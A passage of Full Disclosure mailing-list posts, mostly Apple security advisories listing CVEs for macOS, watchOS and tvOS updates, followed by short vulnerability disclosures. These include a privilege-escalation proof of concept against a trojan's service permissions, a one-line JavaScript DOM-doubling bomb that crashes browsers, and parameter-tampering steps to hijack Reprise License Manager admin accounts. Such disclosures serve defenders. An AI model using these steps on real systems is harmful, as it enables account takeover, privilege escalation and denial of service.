z1YlzYp18bzYTCdThkIrvQSe/QmYEmdKt16RtQH3qJTyE18h2YLG31gA/ja8iPcN
AdqQqz6tJEq9aUrmeyAhFNsEZX7PHVfuSigqi8495rMcN1xI6caCS7Tio98EVmNe
6cMRLUefSJH0z5GvwjbTgLCKbhv+/pDAq0L8Lqosy9CFS+oMRYyCdXoPL3E2wOpd
nxVgjctp6YJrjT/LFdeT8e3gu6oOo/Pj+bx9RWP8vVS0jos5DXOJJAnLn3qOt9yS
tqmECBpque3L3PrhToPdSCiIFE8JbHFBWscO/TaF3rQvmZfLSx+HKJR8VSAjpGTh
jLHWAQUFUauoQ1TudmtA3y9rolCkvhMeZXvbi0dxkEgRtBCbJzRWfMQ6rPeOOkgU
USBkVM/O55bhQ1JqmpUBq2s4lCx6EErwSm1XS6ooXxZt9FWltqhu+ixgne63X8U5
+cLJlkRWjeIC63pziGkB6RbIQkupEanrbH8ekRFQs4zIazq1fjZANRN71y+wAZZ5
tcbvH37FzUPT7HL9ZPMO8wvVVFEEHNx4RIB+KNSH2E/z67Jhs9nM1atUNg1djufg
/mmAfx/83pQretb4xqiN6VKJdPCY/BXkWhBJbdWUpqsODUmfvY0=
=wSSi
-END PGP SIGNATURE-

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] APPLE-SA-01-22-2024-5 macOS Sonoma 14.3

[Apple Product Security via Fulldisclosure]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

APPLE-SA-01-22-2024-5 macOS Sonoma 14.3

macOS Sonoma 14.3 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/kb/HT214061.

Apple maintains a Security Updates page at
https://support.apple.com/HT201222 which lists recent
software updates with security advisories.

Apple Neural Engine
Available for: macOS Sonoma
Impact: An app may be able to execute arbitrary code with kernel
privileges
Description: The issue was addressed with improved memory handling.
CVE-2024-23212: Ye Zhang of Baidu Security

CoreCrypto
Available for: macOS Sonoma
Impact: An attacker may be able to decrypt legacy RSA PKCS#1 v1.5
ciphertexts without having the private key
Description: A timing side-channel issue was addressed with improvements
to constant-time computation in cryptographic functions.
CVE-2024-23218: Clemens Lang

Finder
Available for: macOS Sonoma
Impact: An app may be able to access sensitive user data
Description: The issue was addressed with improved checks.
CVE-2024-23224: Brian McNulty

Kernel
Available for: macOS Sonoma
Impact: An app may be able to execute arbitrary code with kernel
privileges
Description: The issue was addressed with improved memory handling.
CVE-2024-23208: fmyy(@binary_fmyy) and lime From TIANGONG Team of
Legendsec at QI-ANXIN Group

LLVM
Available for: macOS Sonoma
Impact: Processing web content may lead to arbitrary code execution
Description: The issue was addressed with improved memory handling.
CVE-2024-23209

Mail Search
Available for: macOS Sonoma
Impact: An app may be able to access sensitive user data
Description: This issue was addressed with improved redaction of
sensitive information.
CVE-2024-23207: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab), and
Ian de Marcellus

NSSpellChecker
Available for: macOS Sonoma
Impact: An app may be able to access sensitive user data
Description: A privacy issue was addressed with improved handling of
files.
CVE-2024-23223: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

Safari
Available for: macOS Sonoma
Impact: A user's private browsing activity may be visible in Settings
Description: A privacy issue was addressed with improved handling of
user preferences.
CVE-2024-23211: Mark Bowers

Shortcuts
Available for: macOS Sonoma
Impact: A shortcut may be able to use sensitive data with certain
actions without prompting the user
Description: The issue was addressed with additional permissions checks.
CVE-2024-23203: an anonymous researcher
CVE-2024-23204: Jubaer Alnazi (@h33tjubaer)

Shortcuts
Available for: macOS Sonoma
Impact: An app may be able to bypass certain Privacy preferences
Description: A privacy issue was addressed with improved handling of
temporary files.
CVE-2024-23217: Kirin (@Pwnrin)

TCC
Available for: macOS Sonoma
Impact: An app may be able to access user-sensitive data
Description: An issue was addressed with improved handling of temporary
files.
CVE-2024-23215: Zhongquan Li (@Guluisacat)

Time Zone
Available for: macOS Sonoma
Impact: An app may be able to view a user's phone number in system logs
Description: This issue was addressed with improved redaction of
sensitive information.
CVE-2024-23210: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

WebKit
Available for: macOS Sonoma
Impact: A maliciously crafted webpage may be able to fingerprint the
user
Description: An access issue was addressed with improved access
restrictions.
WebKit Bugzilla: 262699
CVE-2024-23206: an anonymous researcher

WebKit
Available for: macOS Sonoma
Impact: Processing web content may lead to arbitrary code execution
Description: The issue was addressed with improved memory handling.
WebKit Bugzilla: 266619
CVE-2024-23213: Wangtaiyu of Zhongfu info

WebKit
Available for: macOS Sonoma
Impact: Processing maliciously crafted web content may lead to arbitrary
code execution
Description: Multiple memory corruption issues were addressed with
improved memory handling.
WebKit Bugzilla: 265129
CVE-2024-23214: Nan Wang (@eternalsakura13) of 360 Vulnerability
Research Institute

WebKit
Available for: macOS Sonoma
Impact: Processing maliciously crafted web content may lead to arbitrary
code execution. Apple is aware of a report that this issue may have been
exploited.
Description: A type confusion issue was addressed with improved checks.
WebKit Bugzilla: 267134
CVE-2024-23222

macOS Sonoma 14.3 may be obtained from the Mac App Store or Apple's
Software Downloads web site: https://support.apple.com/downloads/
All information is also posted on the Apple Security Updates
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-BEGIN PGP SIGNATURE-

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmWvDgUACgkQX+5d1TXa
Ivrf0Q/+Oca+geM2QXg9QR+6PJwuFfzuAMn2nm88bHWtJH6kaTe8Lc48OuFk6j0C
Q9KoLCDG7JTya701wTgIfCnJEpS7J

[FD] APPLE-SA-01-22-2024-6 macOS Ventura 13.6.4

[Apple Product Security via Fulldisclosure]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

APPLE-SA-01-22-2024-6 macOS Ventura 13.6.4

macOS Ventura 13.6.4 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/kb/HT214058.

Apple maintains a Security Updates page at
https://support.apple.com/HT201222 which lists recent
software updates with security advisories.

Apple Neural Engine
Available for: macOS Ventura
Impact: An app may be able to execute arbitrary code with kernel
privileges
Description: The issue was addressed with improved memory handling.
CVE-2024-23212: Ye Zhang of Baidu Security

Accessibility
Available for: macOS Ventura
Impact: An app may be able to access sensitive user data
Description: A privacy issue was addressed with improved private data
redaction for log entries.
CVE-2023-42937: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

Core Data
Available for: macOS Ventura
Impact: An app may be able to bypass Privacy preferences
Description: This issue was addressed by removing the vulnerable code.
CVE-2023-40528: Kirin (@Pwnrin) of NorthSea

curl
Available for: macOS Ventura
Impact: Multiple issues in curl
Description: Multiple issues were addressed by updating to curl version
8.4.0.
CVE-2023-38545
CVE-2023-38039
CVE-2023-38546
CVE-2023-42915

Finder
Available for: macOS Ventura
Impact: An app may be able to access sensitive user data
Description: The issue was addressed with improved checks.
CVE-2024-23224: Brian McNulty

ImageIO
Available for: macOS Ventura
Impact: Processing a maliciously crafted image may result in disclosure
of process memory
Description: The issue was addressed with improved checks.
CVE-2023-42888: Michael DePlante (@izobashi) of Trend Micro Zero Day
Initiative

LoginWindow
Available for: macOS Ventura
Impact: A local attacker may be able to view the previous logged in
user’s desktop from the fast user switching screen
Description: An authentication issue was addressed with improved state
management.
CVE-2023-42935

Mail Search
Available for: macOS Ventura
Impact: An app may be able to access sensitive user data
Description: This issue was addressed with improved redaction of
sensitive information.
CVE-2024-23207: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab), and
Ian de Marcellus

NSOpenPanel
Available for: macOS Ventura
Impact: An app may be able to read arbitrary files
Description: An access issue was addressed with additional sandbox
restrictions.
CVE-2023-42887: Ron Masas of BreakPoint.sh

WebKit
Available for: macOS Ventura
Impact: Processing maliciously crafted web content may lead to arbitrary
code execution. Apple is aware of a report that this issue may have been
exploited.
Description: A type confusion issue was addressed with improved checks.
WebKit Bugzilla: 267134
CVE-2024-23222

macOS Ventura 13.6.4 may be obtained from the Mac App Store or
Apple's Software Downloads web site:
https://support.apple.com/downloads/
All information is also posted on the Apple Security Updates
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-BEGIN PGP SIGNATURE-

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmWvDk0ACgkQX+5d1TXa
IvrWTw/8DbDE/5ejAyR2F08VphoiOnJD5URY5WINPWVWps0w9svMI83Ig+MLlbVY
APek5kQlSVJJoI7RXrSxgRCs3gcWVWVo08iVIM6woBbsd5JPaTYXe9/yUdRzWBX4
zgOxvCh5wL4czXUV0ym4OMlDE5BZ3N+hEpyAIOJmNV7jkNnMshMWfeN6puFZgwt/
FYt1BrU+MJ4PRA/A3B01ic3VQFnHifCE1jF/ebfb7DwZafK6EO2Hf91MNgAic5Td
Q4TvwnHOqAq1N0cZa+SKNsStVx5Yk4J0ovNeecdQA2xNVfnd7jLaU1Y57SHjxNi9
wbsENC3bTpZed+lMhDiBaRIj//Ej6KMeQKUNbcvPH5HCHP5YN68QFwkoA+QJdX66
SH7jvDI6xgjlvVoNjqZ6bYHDr+CK5AB7fLDXhEGWBIssjce8AeaNPPA7JHMsVCen
o7WXri4Bb7W4BwfpicTPlumkF+vva+nKYWvuAfob7v2yayeCa8vPKgrEPHXbCnWa
8r1lqyQVqKL1wqS5RcpsHZEWrV2HF0hoKam4x3ZmLqNDhnVC0t8IipL0vqN+vzaU
t26QZrpiW8V7CZRiXeCj5rDhv8Z1w+wEiuGLTqp9Z1JD/mCVy7Tmm2Y6RNYZw+jk
lwpJpwqOpXbsCdx6kU28V8H1elS5cz3RdGCDex55lOlrMXp+KOs=
=VoRh
-END PGP SIGNATURE-

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] APPLE-SA-01-22-2024-7 macOS Monterey 12.7.3

[Apple Product Security via Fulldisclosure]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

APPLE-SA-01-22-2024-7 macOS Monterey 12.7.3

macOS Monterey 12.7.3 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/kb/HT214057.

Apple maintains a Security Updates page at
https://support.apple.com/HT201222 which lists recent
software updates with security advisories.

Accessibility
Available for: macOS Monterey
Impact: An app may be able to access sensitive user data
Description: A privacy issue was addressed with improved private data
redaction for log entries.
CVE-2023-42937: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

Apple Neural Engine
Available for: macOS Monterey
Impact: An app may be able to execute arbitrary code with kernel
privileges
Description: The issue was addressed with improved memory handling.
CVE-2024-23212: Ye Zhang of Baidu Security

curl
Available for: macOS Monterey
Impact: Multiple issues in curl
Description: Multiple issues were addressed by updating to curl version
8.4.0.
CVE-2023-38545
CVE-2023-38039
CVE-2023-38546
CVE-2023-42915

ImageIO
Available for: macOS Monterey
Impact: Processing a maliciously crafted image may result in disclosure
of process memory
Description: The issue was addressed with improved checks.
CVE-2023-42888: Michael DePlante (@izobashi) of Trend Micro Zero Day
Initiative

Mail Search
Available for: macOS Monterey
Impact: An app may be able to access sensitive user data
Description: This issue was addressed with improved redaction of
sensitive information.
CVE-2024-23207: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab), and
Ian de Marcellus

WebKit
Available for: macOS Monterey
Impact: Processing maliciously crafted web content may lead to arbitrary
code execution. Apple is aware of a report that this issue may have been
exploited.
Description: A type confusion issue was addressed with improved checks.
WebKit Bugzilla: 267134
CVE-2024-23222

macOS Monterey 12.7.3 may be obtained from the Mac App Store or
Apple's Software Downloads web site:
https://support.apple.com/downloads/
All information is also posted on the Apple Security Updates
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-BEGIN PGP SIGNATURE-

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmWvDnUACgkQX+5d1TXa
Ivqrqw//QZOnZpH5CnbfH10rxFF0CbZFRcHClM3RutihC4AuO5FedR3EDnUGyp53
eJADLlNz3dTg15scv6P4AuT+hg8k3OFEPi1f2jVgRxlqsW8a15iIXYGti8y4UVwo
kQgzfxYv33zuY0yWlIlERIP7imIT0jNgwFKn+Gs2ZaBq1xw52xq3I/jf97txAQHX
Rpe35hnhYS7eGlB8spErKGBgyTuOf+piL7zccb+G/Hw6Y8AwSLsvXg3lSgZavEWE
UIBoYGLycszT9U7tybuPUJ83jD0lIqFNhGNzHM6BnajYJ8SVdAXqVfid8Km9ixoi
Sm73F6ZlCrUSLxihjXz92NQnBXJM2AxVI3Z1QqsqxOTS9yrkHYSgFgqUxxaP7ONt
voHYw6fuycYca9TbFPmu6aStW1UBNwMLWYgjxbuTqqs+OEI8DKGcHIihGPQ184jW
VF1bYNK8bvRMM+n/kaIHNo9/AyPnnSjmEOzr946ypg90FvTy3Wu1HhUm1MslzjNC
LG5j6/hh0H7MXii8o5UL4ayabnPyZbWJrhRntvwx86xTLV9DPwmuwvxeVWm87Wu0
EYC/XRAbtspHXMn5ItTNgqGbf0lKlrluXrAW79EFQdvPyD/Fzyljb+W9o2w1IA/9
O8oXMVxqM4W+iRokcDbcbNQI3J2xGaP8FNwG6EEBB+bKkNWZ0m0=
=zFhG
-END PGP SIGNATURE-

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] APPLE-SA-01-22-2024-8 watchOS 10.3

[Apple Product Security via Fulldisclosure]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

APPLE-SA-01-22-2024-8 watchOS 10.3

watchOS 10.3 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/kb/HT214060.

Apple maintains a Security Updates page at
https://support.apple.com/HT201222 which lists recent
software updates with security advisories.

Apple Neural Engine
Available for devices with Apple Neural Engine: Apple Watch Series 9 and
Apple Watch Ultra 2
Impact: An app may be able to execute arbitrary code with kernel
privileges
Description: The issue was addressed with improved memory handling.
CVE-2024-23212: Ye Zhang of Baidu Security

CoreCrypto
Available for: Apple Watch Series 4 and later
Impact: An attacker may be able to decrypt legacy RSA PKCS#1 v1.5
ciphertexts without having the private key
Description: A timing side-channel issue was addressed with improvements
to constant-time computation in cryptographic functions.
CVE-2024-23218: Clemens Lang

Kernel
Available for: Apple Watch Series 4 and later
Impact: An app may be able to execute arbitrary code with kernel
privileges
Description: The issue was addressed with improved memory handling.
CVE-2024-23208: fmyy(@binary_fmyy) and lime From TIANGONG Team of
Legendsec at QI-ANXIN Group

Mail Search
Available for: Apple Watch Series 4 and later
Impact: An app may be able to access sensitive user data
Description: This issue was addressed with improved redaction of
sensitive information.
CVE-2024-23207: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab), and
Ian de Marcellus

NSSpellChecker
Available for: Apple Watch Series 4 and later
Impact: An app may be able to access sensitive user data
Description: A privacy issue was addressed with improved handling of
files.
CVE-2024-23223: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

Safari
Available for: Apple Watch Series 4 and later
Impact: A user's private browsing activity may be visible in Settings
Description: A privacy issue was addressed with improved handling of
user preferences.
CVE-2024-23211: Mark Bowers

Shortcuts
Available for: Apple Watch Series 4 and later
Impact: A shortcut may be able to use sensitive data with certain
actions without prompting the user
Description: The issue was addressed with additional permissions checks.
CVE-2024-23204: Jubaer Alnazi (@h33tjubaer)

Shortcuts
Available for: Apple Watch Series 4 and later
Impact: An app may be able to bypass certain Privacy preferences
Description: A privacy issue was addressed with improved handling of
temporary files.
CVE-2024-23217: Kirin (@Pwnrin)

TCC
Available for: Apple Watch Series 4 and later
Impact: An app may be able to access user-sensitive data
Description: An issue was addressed with improved handling of temporary
files.
CVE-2024-23215: Zhongquan Li (@Guluisacat)

Time Zone
Available for: Apple Watch Series 4 and later
Impact: An app may be able to view a user's phone number in system logs
Description: This issue was addressed with improved redaction of
sensitive information.
CVE-2024-23210: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

WebKit
Available for: Apple Watch Series 4 and later
Impact: A maliciously crafted webpage may be able to fingerprint the
user
Description: An access issue was addressed with improved access
restrictions.
WebKit Bugzilla: 262699
CVE-2024-23206: an anonymous researcher

WebKit
Available for: Apple Watch Series 4 and later
Impact: Processing web content may lead to arbitrary code execution
Description: The issue was addressed with improved memory handling.
WebKit Bugzilla: 266619
CVE-2024-23213: Wangtaiyu of Zhongfu info

Instructions on how to update your Apple Watch software are available
at https://support.apple.com/kb/HT204641  To check the version on
your Apple Watch, open the Apple Watch app on your iPhone and select
"My Watch > General > About".  Alternatively, on your watch, select
"My Watch > General > About".
All information is also posted on the Apple Security Updates
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-BEGIN PGP SIGNATURE-

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmWvDqsACgkQX+5d1TXa
IvqR0Q//a137PlcPioIws/A02XClBQtF95fwuaz7DEhi79XZvH1q1+N3EYd/1b8l
YkGdXQik8uS4zpB4KBJ+8cRYqaNaMDO0lNr2RdGgUInMd2bc+HBHigxEY47Wzbr2
UT3r2uJW70HalBNrGNOj15JQTQ4MhbjjTq/ezrIdCFTo1RHk9vOc//AajbDtWiQp
X5jGhoGzDB378vswEEyp4OjArh5v2xEv5hcoIvrzlgkSz9aRwzLgluR7sXGifE6O
vU7zP2oT36zwBAfTsY1CkarTeQprQ4iyiEIlDzwxr+Z2ooGUmOStzsQtuU28QSQK
sl0b42V7mkTFWVCXymsjCBbGw/JPSkGzptOPNqoEtBddiMuLU2BGBWk51xa5cEzy
tsLWd1vlnUms3CqM6QvOxdj3mzs4wzxha941a0h67lR7NeR09CqflKsr7vDFWOBY
PdVAUSDRxeM1rntVJfFJAkssUV14TGSTDwqMQmiUyxqXfKymSc4dCqIDLyqcdblB
wNtwKFlstCZxcmc2V0zfDWHJ0y75sTUUhlk3AvH/OeVve9rhDvtKdoKDHdOauKHw
kss00oy5TLkeTYi26oJfEMtts7BS+8ZEF3cLNxOBZ/cdIO1+Ifl8jNcluTLlC8F7
4MxcjC8prTl0aZ4sqJfcUBLnqkMdn0GaqXOPXSa6hQxiNc5dcIk=
=hoM+

[FD] APPLE-SA-01-22-2024-9 tvOS 17.3

[Apple Product Security via Fulldisclosure]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

APPLE-SA-01-22-2024-9 tvOS 17.3

tvOS 17.3 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/kb/HT214055.

Apple maintains a Security Updates page at
https://support.apple.com/HT201222 which lists recent
software updates with security advisories.

Apple Neural Engine
Available for: Apple TV HD and Apple TV 4K (all models)
Impact: An app may be able to execute arbitrary code with kernel
privileges
Description: The issue was addressed with improved memory handling.
CVE-2024-23212: Ye Zhang of Baidu Security

CoreCrypto
Available for: Apple TV HD and Apple TV 4K (all models)
Impact: An attacker may be able to decrypt legacy RSA PKCS#1 v1.5
ciphertexts without having the private key
Description: A timing side-channel issue was addressed with improvements
to constant-time computation in cryptographic functions.
CVE-2024-23218: Clemens Lang

Kernel
Available for: Apple TV HD and Apple TV 4K (all models)
Impact: An app may be able to execute arbitrary code with kernel
privileges
Description: The issue was addressed with improved memory handling.
CVE-2024-23208: fmyy(@binary_fmyy) and lime From TIANGONG Team of
Legendsec at QI-ANXIN Group

NSSpellChecker
Available for: Apple TV HD and Apple TV 4K (all models)
Impact: An app may be able to access sensitive user data
Description: A privacy issue was addressed with improved handling of
files.
CVE-2024-23223: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

TCC
Available for: Apple TV HD and Apple TV 4K (all models)
Impact: An app may be able to access user-sensitive data
Description: An issue was addressed with improved handling of temporary
files.
CVE-2024-23215: Zhongquan Li (@Guluisacat)

Time Zone
Available for: Apple TV HD and Apple TV 4K (all models)
Impact: An app may be able to view a user's phone number in system logs
Description: This issue was addressed with improved redaction of
sensitive information.
CVE-2024-23210: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

WebKit
Available for: Apple TV HD and Apple TV 4K (all models)
Impact: A maliciously crafted webpage may be able to fingerprint the
user
Description: An access issue was addressed with improved access
restrictions.
WebKit Bugzilla: 262699
CVE-2024-23206: an anonymous researcher

WebKit
Available for: Apple TV HD and Apple TV 4K (all models)
Impact: Processing web content may lead to arbitrary code execution
Description: The issue was addressed with improved memory handling.
WebKit Bugzilla: 266619
CVE-2024-23213: Wangtaiyu of Zhongfu info

WebKit
Available for: Apple TV HD and Apple TV 4K (all models)
Impact: Processing maliciously crafted web content may lead to arbitrary
code execution. Apple is aware of a report that this issue may have been
exploited.
Description: A type confusion issue was addressed with improved checks.
WebKit Bugzilla: 267134
CVE-2024-23222

Apple TV will periodically check for software updates. Alternatively,
you may manually check for software updates by selecting "Settings ->
System -> Software Update -> Update Software."  To check the current
version of software, select "Settings -> General -> About."
All information is also posted on the Apple Security Updates
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-BEGIN PGP SIGNATURE-

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmWvDyQACgkQX+5d1TXa
IvoUsA//bw9u1+Jxh79G7jV7SXt8HRV8yqr16Bhq00AqSdDx/RgVGTUs6cN8OfGX
MVda91yeQS7WOEtrw7no8vD2HcGSvcTCRWTRQRSYJjZfZ4C3v9Rnt3Nlx/mvdLQg
50Kn3Gm46C/+iFhuZhtSa9VrDhoaiLs3Wb9nVBrQ917CyNMXeDb1JuP1MOjPJgiJ
IVZlcIwAFrx4f779ove/MtupyeeoHZwV1KICEDyVIZsUGMGf4ti6J8tdK73EmUPo
a1Q6pRx8JRwtXBPkp/1PerRsfzb9bRAksZU6R5d8RdJBTpnx9kfZZpPWknyRX2R9
gR6tJrswgHcalkHDL6UXJfnWS3XCrCHg2jKQbWPDvor6juOMUKfi40ww36H6KdRG
ksNdFaWhmSK0Qu1EqS4bmCWYiUx16O/js7tbbNfXFp+ssjMtjunlVs9Ly3Jh2Fpi
gry4IRE5Ll4oryFxUPV9KGM72eDL8PAwvIgDXx5/NkcrZIGZNl9eseJCsfZ/AV7Z
dZTcc78Yguenm5Nsot6GmL1q0+LCj48PmcFu6VQF7KSFWcehAKjVIk+DaAOJITgF
uJekaVJp3mVe5XRvtQrfMlegiog40gPxQgwJ/psUyp3Ss5uIOPF6EUrAj2xqERRc
GVDDKWA3BFSCOJD/dtR/xmiwJdRMQwomeo8k1uUpd96ICM6VgJM=
=HfBk
-END PGP SIGNATURE-

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] TrojanSpy Win32 Nivdort / Insecure Permissions - EoP (SYSTEM)

[malvuln]

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024
Original source:
https://malvuln.com/advisory/15bda00b57e2ed729a45f7cfa62165da.txt
Contact: malvul...@gmail.com
Media: twitter.com/malvuln

Threat: TrojanSpy Win32 Nivdort
Vulnerability: Insecure Permissions - EoP (SYSTEM)
Family: Nivdort
Type: PE32
MD5: 15bda00b57e2ed729a45f7cfa62165da
Vuln ID: MVID-2024-0668
Dropped files: dqrpgvnkh, egjrdhynfm, nhefhloix, rvoyf6ljtqg4zejno.exe
Disclosure: 01/20/2024

Description:
The malware creates a service which runs as SYSTEM and grants change (C)
permissions to the authenticated user group on its installation directory.
Standard low integrity users can still rename the service executable while
it is running, replace the PE file with their own and restart the infected
system to start the service.

C:\>cacls C:\pewcvmnvyr\jwgaklb.exe
C:\pewcvmnvyr\jwgaklb.exe BUILTIN\Administrators:(ID)F
  NT AUTHORITY\SYSTEM:(ID)F
  BUILTIN\Users:(ID)R
  NT AUTHORITY\Authenticated Users:(ID)C


C:\>sc qc "Group Key KtmRm Coordinator Registry TPM Bus"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Group Key KtmRm Coordinator Registry TPM Bus
TYPE   : 110  WIN32_OWN_PROCESS (interactive)
START_TYPE : 2   AUTO_START
ERROR_CONTROL  : 0   IGNORE
BINARY_PATH_NAME   : C:\pewcvmnvyr\jwgaklb.exe
LOAD_ORDER_GROUP   :
TAG: 0
DISPLAY_NAME   : Group Key KtmRm Coordinator Registry TPM Bus
DEPENDENCIES   :
SERVICE_START_NAME : LocalSystem


Exploit/PoC:
Open a cmd prompt as standard user:

1) unhide the service binary
   C:\Users\norgt>attrib -s -h \pewcvmnvyr\jwgaklb.exe

2) rename the service binary
C:\Users\norgt>ren \pewcvmnvyr\jwgaklb.exe PWNED

3) optional replace with your own binary and escalate to SYSTEM

C:\Users\norgt>dir \pewcvmnvyr\
 Directory of C:\pewcvmnvyr
..
01/14/2024  02:05 AM 0 dqrpgvnkh
01/14/2024  02:05 AM 6 egjrdhynfm
01/14/2024  02:09 AM 4 nhefhloix
01/14/2024  02:05 AM   332,800 PWNED   <= DONE
01/14/2024  02:05 AM   332,800 rvoyf9njtqg4zejno.exe


Disclaimer: The information contained within this advisory is supplied
"as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information
contained herein and accepts no responsibility for any damage caused by the
use or misuse of this information. The author prohibits any malicious use
of security related information or exploits by the author or elsewhere. Do
not attempt to download Malware samples. The author of this website takes
no responsibility for any kind of damages occurring from improper Malware
handling or the downloading of ANY Malware mentioned on this website or
elsewhere. All content Copyright (c) Malvuln.com (TM).
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] Yet another fork()/malloc() bomb in javascript + SIGILL in Chrome

[Georgi Guninski]

Searching the web for `javascript fork malloc bomb` returns results,
e.g. [here][1]: and [here][2]:

We got a javascript fork malloc bomb which crashed Chrome 121 on linux
with SIGILL and about one in five runs the virtual machine freezes.
SIGILL almost always is a sign of memory corruption :)
On android it crashes the current tab without explanation.
Firefox 121 on linux also crashes the current tab.

In all cases except the sporadic freezes, the browser remains functioning,
not counting the crashed tab.

The javscript code is simply simple:

`setInterval("document.body.innerHTML += document.body.innerHTML ",1);`

[Online demo][3]: In case someone wants to test it on other browsers
or debug.

The GNU/linux tests took about 1.5 minutes in a virtual machine with
4GB RAM and single core.

[1]: http://wiki.glitchdata.com/index.php/Examples_of_fork_bombs#JavaScript
[2]: https://gist.github.com/betandr/f0cbbb663accc3a76c11cc7661711566#javascript
[3]: https://www.guninski.com/fork1.html
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] Multiple Vulnerabilities in Reprise License Manager 15.1 (CVE-2023-43183, CVE-2023-44031)

[Rahim, Mohaiman via Fulldisclosure]

Multiple Vulnerabilities in Reprise License Manager 15.1 (CVE-2023-43183, 
CVE-2023-44031)

Credit: Mohaiman Rahim

/

# Product:  RLM 15.1
# Vendor:   Reprise Software
# CVE ID:   CVE-2023-43183
# Vulnerability Title: Incorrect Access Control (leading to PrivEsc)
# Severity:  High
# Author(s): Mohaiman Rahim
# Date: 2024-01-14
#
#
Introduction:
Reprise License Manager 15.1 is affected by an incorrect access control 
vulnerability which allows low level users, such as read-only users, to 
arbitrarily change the password of an admin and hijack their account.

Vulnerability PoC:

This vulnerability can be demonstrated by modifying the "user" POST parameter 
at http://HOST:5054/change_password_process with the username of a target user 
(such as an Admin account).
When executed this will result in the password of the targeted user being 
changed and the account therefore being compromised.






# Product:  RLM 15.1
# Vendor:   Reprise Software
# CVE ID:   CVE-2023-44031
# Vulnerability Title: Incorrect Access Control (leading to arbitrary file 
write)
# Severity:  High
# Author(s): Mohaiman Rahim
# Date: 2024-01-14
#
#
Introduction:
Reprise License Manager 15.1 is affected by an incorrect access control 
vulnerability which allows a user to perform privileged web application 
functions, such as a function that generates system information.
This vulnerability can be exploited to be able to change the path of where the 
diagnostics file should be saved via a crafted HTTP POST request.
This can allow an attacker to save the diagnostics file, containing system 
information, in insecure locations.

Vulnerability PoC:

This vulnerability can be demonstrated by modifying the "outputfile" POST 
parameter at http://HOST:5054/diagnostics_doit to an insecure path accessible 
by local users such as "C:\temp".

Deloitte Disclaimer: Deloitte refers to a Deloitte member firm, one of its 
related entities, or Deloitte Touche Tohmatsu Limited ("DTTL"). Each Deloitte 
member firm is a separate legal entity and a member of DTTL. DTTL does not 
provide services to clients. Please see www.deloitte.com/about to learn more. 
Deloitte Statsautoriseret Revisionspartnerselskab, CVR-nr. 33 96 35 56 This 
message (including any attachments) contains confidential information intended 
for a specific individual and purpose, and is protected by law. If you are not 
the intended recipient, you should delete this message and are hereby notified 
that any disclosure, copying, or distribution of this message, or the taking of 
any action based on it, is strictly prohibited.
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] Null pointer deference in freedesktop mesa

[Meng Ruijie]

[Vulnerability description]
freedesktop Mesa v23.0.4 was discovered to contain a NULL pointer dereference 
via the function dri2GetGlxDrawableFromXDrawableId(). This vulnerability is 
triggered when the X11 server sends an DRI2_BufferSwapComplete event 
unexpectedly when the application is using DRI3.

[VulnerabilityType Other]
null pointer deference

[Vendor of Product]
freedesktop

